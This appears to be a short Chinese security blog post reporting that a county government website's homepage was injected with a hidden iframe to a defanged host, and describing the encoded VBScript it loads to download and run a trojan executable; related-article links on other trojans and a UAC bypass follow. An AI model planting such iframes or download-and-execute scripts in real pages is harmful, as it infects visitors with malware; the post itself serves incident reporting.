01-12/某县政府网被加入下载木马 Trojan.Win32.Pakes 的代码(第2版)

简介: 01-12/某县政府网被加入下载木马 Trojan.Win32.Pakes 的代码(第2版)

该政府网站首页被加入代码:

/--------
<iframe src=hxxp://www.***.race*s**wd.com.**/w*m***.htm width=0 height=0 frameborder=0></iframe>
--------/

w*m***.htm      的内容为escape()加密的VBScript脚本代码,功能是利用 Microsoft.XMLHTTP 和 Scripting.FileSystemObject 下载文件 1**.exe,保存为 %temp% 中的 asde.exe,并利用Shell.Application 对象 的 ShellExecute 方法 来运行。


相关文章
|
2月前
|
数据安全/隐私保护
一个下载灰鸽子Backdoor.Win32.Hupigon.cge的网站
一个下载灰鸽子Backdoor.Win32.Hupigon.cge的网站
|
2月前
|
安全
某可人官方网站挂马Trojan-PSW.Win32.OnLineGames.sbg
某可人官方网站挂马Trojan-PSW.Win32.OnLineGames.sbg
|
2月前
|
安全 JavaScript 前端开发
某政府网站被挂木马txet.exe/Trojan-PSW.Win32.QQRob.iy
某政府网站被挂木马txet.exe/Trojan-PSW.Win32.QQRob.iy
|
2月前
|
安全 Windows
木马windowout.exe
木马windowout.exe
|
2月前
|
安全 数据安全/隐私保护
某县政府网被加入下载木马Trojan-PSW.Win32.QQShou.ix的代码
某县政府网被加入下载木马Trojan-PSW.Win32.QQShou.ix的代码
某论坛被挂马 down.exe / Virus.Win32.AutoRun.z / Trojan.PWS.Maran.262
某论坛被挂马 down.exe / Virus.Win32.AutoRun.z / Trojan.PWS.Maran.262
|
2月前
|
安全 数据安全/隐私保护
一个被加入下载木马Trojan-Downloader.Win32.Delf.ajm的网站
一个被加入下载木马Trojan-Downloader.Win32.Delf.ajm的网站
|
存储 JSON 安全
phpStudy 小皮 Windows面板 RCE漏洞
详情看文章内叙述
283 1
|
C# Windows
exe文件,后门免杀的制作学习笔记
版权声明:转载请注明出处:http://blog.csdn.net/dajitui2024 https://blog.csdn.net/dajitui2024/article/details/79396307 引用原文!! 注:本文技术非原创,转载请直接对原文转载,请不要对本文打赏等,本文为学习笔记,禁止由本文产生任何盈利行为。
1536 0
|
安全 Windows Shell
DccwBypassUAC - Windows 8.1和10 UAC绕过dccw exe中的WinSxS
版权声明:转载请注明出处:http://blog.csdn.net/dajitui2024 https://blog.csdn.net/dajitui2024/article/details/79396473 ...
1563 0